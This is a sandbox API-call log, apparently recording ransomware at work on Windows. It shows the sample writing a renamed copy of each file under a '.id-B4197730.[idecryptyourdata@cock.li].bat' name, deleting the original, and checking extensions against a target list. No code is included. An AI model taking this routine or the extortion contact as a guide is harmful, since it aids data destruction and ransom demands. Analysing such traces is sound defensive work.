[0046.445] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.445] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.445] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.445] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.445] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.446] GetLastError () returned 0x0 [0046.446] ReadFile (in: hFile=0x2d8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x81, lpOverlapped=0x0) returned 1 [0046.446] WriteFile (in: hFile=0x2e0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x90, lpOverlapped=0x0) returned 1 [0046.446] ReadFile (in: hFile=0x2d8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.446] WriteFile (in: hFile=0x2e0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xea, lpOverlapped=0x0) returned 1 [0046.446] SetEndOfFile (hFile=0x2e0) returned 1 [0046.447] CloseHandle (hObject=0x2e0) returned 1 [0046.447] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.447] SetEndOfFile (hFile=0x2d8) returned 1 [0046.448] CloseHandle (hObject=0x2d8) returned 1 [0046.448] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x26) returned 1 [0046.448] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 1 [0046.449] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.449] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.449] lstrlenW (lpString=".doc") returned 4 [0046.449] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0046.449] lstrlenW (lpString=".docx") returned 5 [0046.449] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0046.449] lstrlenW (lpString=".pdf") returned 4 [0046.449] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0046.449] lstrlenW (lpString=".xls") returned 4 [0046.449] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0046.449] lstrlenW (lpString=".xlsx") returned 5 [0046.449] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0046.449] lstrlenW (lpString=".ppt") returned 4 [0046.449] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0046.449] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.449] lstrlenW (lpString=".zip") returned 4 [0046.449] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0046.449] lstrlenW (lpString=".rar") returned 4 [0046.449] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0046.449] lstrlenW (lpString=".bz2") returned 4 [0046.449] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0046.449] lstrlenW (lpString=".7z") returned 3 [0046.449] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0046.449] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.449] lstrlenW (lpString=".dbf") returned 4 [0046.449] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0046.449] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.449] lstrlenW (lpString=".1cd") returned 4 [0046.449] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0046.449] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.449] lstrlenW (lpString=".jpg") returned 4 [0046.449] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0046.449] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.449] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.449] lstrlenW (lpString=".doc") returned 4 [0046.449] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0046.450] lstrlenW (lpString=".docx") returned 5 [0046.450] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0046.450] lstrlenW (lpString=".pdf") returned 4 [0046.450] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0046.450] lstrlenW (lpString=".xls") returned 4 [0046.450] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0046.450] lstrlenW (lpString=".xlsx") returned 5 [0046.450] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0046.450] lstrlenW (lpString=".ppt") returned 4 [0046.450] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0046.450] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.450] lstrlenW (lpString=".zip") returned 4 [0046.450] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0046.450] lstrlenW (lpString=".rar") returned 4 [0046.450] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0046.450] lstrlenW (lpString=".bz2") returned 4 [0046.450] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0046.450] lstrlenW (lpString=".7z") returned 3 [0046.450] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0046.450] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.450] lstrlenW (lpString=".dbf") returned 4 [0046.450] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0046.450] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.450] lstrlenW (lpString=".1cd") returned 4 [0046.450] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0046.450] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0046.450] lstrlenW (lpString=".jpg") returned 4 [0046.450] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0046.450] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0046.450] lstrlenW (lpString="eula.rtf") returned 8 [0046.450] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.453] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=7567) returned 1 [0046.453] CloseHandle (hObject=0x2e0) returned 1 [0046.453] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf")) returned 0x80 [0046.453] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.453] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.453] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.454] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.454] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.454] GetLastError () returned 0x0 [0046.454] ReadFile (in: hFile=0x2e0, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1d8f, lpOverlapped=0x0) returned 1 [0046.655] WriteFile (in: hFile=0x2e4, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1d90, lpOverlapped=0x0) returned 1 [0046.656] ReadFile (in: hFile=0x2e0, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.656] WriteFile (in: hFile=0x2e4, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xe4, lpOverlapped=0x0) returned 1 [0046.657] SetEndOfFile (hFile=0x2e4) returned 1 [0046.657] CloseHandle (hObject=0x2e4) returned 1 [0046.660] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.660] SetEndOfFile (hFile=0x2e0) returned 1 [0046.661] CloseHandle (hObject=0x2e0) returned 1 [0046.661] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.661] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf")) returned 1 [0046.661] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.661] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.661] lstrlenW (lpString=".doc") returned 4 [0046.662] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.662] lstrlenW (lpString=".docx") returned 5 [0046.662] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.662] lstrlenW (lpString=".pdf") returned 4 [0046.662] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.662] lstrlenW (lpString=".xls") returned 4 [0046.662] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.662] lstrlenW (lpString=".xlsx") returned 5 [0046.662] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.662] lstrlenW (lpString=".ppt") returned 4 [0046.662] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.662] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.662] lstrlenW (lpString=".zip") returned 4 [0046.662] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.662] lstrlenW (lpString=".rar") returned 4 [0046.662] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.662] lstrlenW (lpString=".bz2") returned 4 [0046.662] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.662] lstrlenW (lpString=".7z") returned 3 [0046.662] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.662] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.662] lstrlenW (lpString=".dbf") returned 4 [0046.662] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.662] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.662] lstrlenW (lpString=".1cd") returned 4 [0046.662] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.662] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.662] lstrlenW (lpString=".jpg") returned 4 [0046.662] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.662] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.662] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.662] lstrlenW (lpString=".doc") returned 4 [0046.662] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.663] lstrlenW (lpString=".docx") returned 5 [0046.663] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.663] lstrlenW (lpString=".pdf") returned 4 [0046.663] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.663] lstrlenW (lpString=".xls") returned 4 [0046.663] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.663] lstrlenW (lpString=".xlsx") returned 5 [0046.663] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.830] lstrlenW (lpString=".ppt") returned 4 [0046.830] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.830] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.830] lstrlenW (lpString=".zip") returned 4 [0046.830] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.830] lstrlenW (lpString=".rar") returned 4 [0046.830] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.830] lstrlenW (lpString=".bz2") returned 4 [0046.830] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.830] lstrlenW (lpString=".7z") returned 3 [0046.830] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.830] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.830] lstrlenW (lpString=".dbf") returned 4 [0046.830] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.830] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.830] lstrlenW (lpString=".1cd") returned 4 [0046.830] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.830] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0046.830] lstrlenW (lpString=".jpg") returned 4 [0046.830] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.831] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0046.831] lstrlenW (lpString="LocalizedData.xml") returned 17 [0046.831] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0046.831] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=86284) returned 1 [0046.831] CloseHandle (hObject=0x2c4) returned 1 [0046.831] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml")) returned 0x80 [0046.831] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.831] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0046.831] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.831] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.832] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.832] GetLastError () returned 0x0 [0046.832] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1510c, lpOverlapped=0x0) returned 1 [0046.917] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x15110, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x15110, lpOverlapped=0x0) returned 1 [0046.920] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.920] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf6, lpOverlapped=0x0) returned 1 [0046.920] SetEndOfFile (hFile=0x300) returned 1 [0046.920] CloseHandle (hObject=0x300) returned 1 [0046.922] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.922] SetEndOfFile (hFile=0x2c4) returned 1 [0046.924] CloseHandle (hObject=0x2c4) returned 1 [0046.924] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.924] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml")) returned 1 [0046.925] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.925] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.925] lstrlenW (lpString=".doc") returned 4 [0046.925] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.925] lstrlenW (lpString=".docx") returned 5 [0046.925] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.925] lstrlenW (lpString=".pdf") returned 4 [0046.925] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.925] lstrlenW (lpString=".xls") returned 4 [0046.925] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.925] lstrlenW (lpString=".xlsx") returned 5 [0046.925] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.925] lstrlenW (lpString=".ppt") returned 4 [0046.925] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.925] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.925] lstrlenW (lpString=".zip") returned 4 [0046.925] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.925] lstrlenW (lpString=".rar") returned 4 [0046.925] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.925] lstrlenW (lpString=".bz2") returned 4 [0046.925] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.925] lstrlenW (lpString=".7z") returned 3 [0046.925] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.925] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.925] lstrlenW (lpString=".dbf") returned 4 [0046.925] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.926] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.926] lstrlenW (lpString=".1cd") returned 4 [0046.926] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.926] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.926] lstrlenW (lpString=".jpg") returned 4 [0046.926] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.926] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.926] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.926] lstrlenW (lpString=".doc") returned 4 [0046.926] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.926] lstrlenW (lpString=".docx") returned 5 [0046.926] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.926] lstrlenW (lpString=".pdf") returned 4 [0046.926] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.926] lstrlenW (lpString=".xls") returned 4 [0046.926] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.926] lstrlenW (lpString=".xlsx") returned 5 [0046.926] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.926] lstrlenW (lpString=".ppt") returned 4 [0046.926] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.926] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.926] lstrlenW (lpString=".zip") returned 4 [0046.926] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.926] lstrlenW (lpString=".rar") returned 4 [0046.926] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.926] lstrlenW (lpString=".bz2") returned 4 [0046.926] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.926] lstrlenW (lpString=".7z") returned 3 [0046.926] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.926] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.927] lstrlenW (lpString=".dbf") returned 4 [0046.927] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.927] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.927] lstrlenW (lpString=".1cd") returned 4 [0046.927] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.927] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0046.927] lstrlenW (lpString=".jpg") returned 4 [0046.927] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.927] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0046.927] lstrlenW (lpString="LocalizedData.xml") returned 17 [0046.927] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0046.927] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=77232) returned 1 [0046.927] CloseHandle (hObject=0x2c4) returned 1 [0046.927] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml")) returned 0x80 [0046.928] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.928] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0046.928] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.928] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.928] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.928] GetLastError () returned 0x0 [0046.928] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x12db0, lpOverlapped=0x0) returned 1 [0046.941] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x12dc0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x12dc0, lpOverlapped=0x0) returned 1 [0046.953] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, 